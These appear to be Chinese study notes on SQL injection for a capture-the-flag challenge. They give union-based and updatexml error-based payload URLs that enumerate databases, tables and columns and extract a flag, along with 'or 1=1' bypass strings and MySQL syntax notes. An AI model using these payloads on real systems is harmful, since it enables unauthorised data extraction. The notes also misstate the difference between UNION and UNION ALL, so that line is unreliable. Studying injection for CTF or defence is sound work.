触发实际的sql注入漏洞之前要

1. 先获取cookie值(如果没有cookie值很多时候会被直接弹出到首页，没法进入到一些深层次的代码逻辑)

2. 获取formhash(防止CSRF的)

3. 对POST或GET或cookie中的某个字段进行某种编码(base64等)

4. 特殊字符(%cf宽字符)注入等

5. 结合POST或COOKIE的变量覆盖的sql注入

6. 盲注入sql语句构造的特殊性

简单SQL注入常见过程：爆数据库名-->爆数据库表-->爆数据列-->爆数据项

http://game.sycsec.com:2006/?id=-1'limit 0,1 union select 2,group_concat(schema_name) from

information_schema.schemata --++&submit=submit

(不使用拼接函数）-1'union select 2,schema_name from information_schema.schemata limit 1,1

http://game.sycsec.com:2006/?id=-1'limit 0,1 union select 2,group_concat(table_name) from information_schema.tables

where table_schema='f1ag'--++&submit=submit

http://game.sycsec.com:2006/?id=-1'limit 0,1 union select 2,group_concat(column_name) from information_schema.columns

where table_name='flag'--++&submit=submit

http://game.sycsec.com:2006/?id=-1'limit 0,1 union select 2,f4ag from f1ag.flag--++&submit=submit

重要指令：

mysql -user(u) username -password(p) password or none  MySQL登录

SHOW DATABASES;(;可用\g代替)：显示当前安装的数据库

SHOW TABLES;查看当前数据库中的可用表的列表

SHOW COLUMNS FROM tablename;查看某个表中的内容，它对每个字段返回一行，行中包含字段名、数据类型、是否允许NULL、键信息、默认值以及其他信息

SELECT tablename.colunname FROM tablename;用来检索数据表中的coulumnname列中的内容，但是同时列出了表明和列名(完全限定)

SELECT coulumname FROM tablename ORDER BY key;以key为导向排序(升序ASC,可省略)

SQL语句格式：

SQL构造

Tips：

limit 后的两个数字表示：第几行开始，读几行

--++  表示注释

order by 2这样的意思是通过字段数量来进行排序

union的作用是将两个sql语句进行联合，Union all与union 的区别是增加了去重的功能

可能使用 " ) 字符；增大number来探测字段数量，之后才能使用union

") or "1"=("1     |***|     ") or 1=1 --+

1' and updatexml(0,concat(0x7e,(SELECT table_name%1.1FROM information_schema.tables where table_schema=database() limit

1,1)),0) and 'a'='a

Concat拼接字段：把多个串链接起来形成一个较长的串，需要一个或多个指定的串，各个串之间用逗号隔开。例如：SELECT Concat(vend_name,'(',vend_country,')') FROM vendors ORDER BY vend_name;d

构造注意：

1、ORDER BY子句必须位于FROM子句之后。

2、当ORDER BY子句和LIMIT子句同时使用时LIMIT子句必须位于ORDER BY子句之后。

3、同时使用WHERE子句和ORDER BY子句时应将ORDER BY子句置于WHERE子句之后。

4、WHERE子句支持=、>、<、!=、<>(不等于)、>=、<=、BETWEEN(指定的两个值之间)过滤操作。

5、AND和OR操作符混合使用时要注意AND操作符的计算次序比OR操作符号的计算次序要高(操作符优先级高)，所以一般有多个操作符时要加上圆括号消除歧义(即使不这样做也是正确的)

6、MySQL支持使用NOT对IN、BETWEEN和EXISTS子句取反(其他DBMS允许使用NOT对各种条件取反)。

7、尾空格可能会干扰通配符匹配，例如：'%anvil'如果anvil后有一个空格则不会被匹配出来。可使用'%anvil%'或者使用函数解决此问题。

8、%通配符不会匹配到NULL。

9、SELECT语句的拼接完成的列是没有名字的，它只是一个值，这种是无法在客户机中直接使用的，所以可以用AS关键字赋予一个别名(也称为导出列)。

例如：SELECT Concat(vend_name,'(',vend_country,')') AS vend_title FROM vendors ORDER BY vend_name;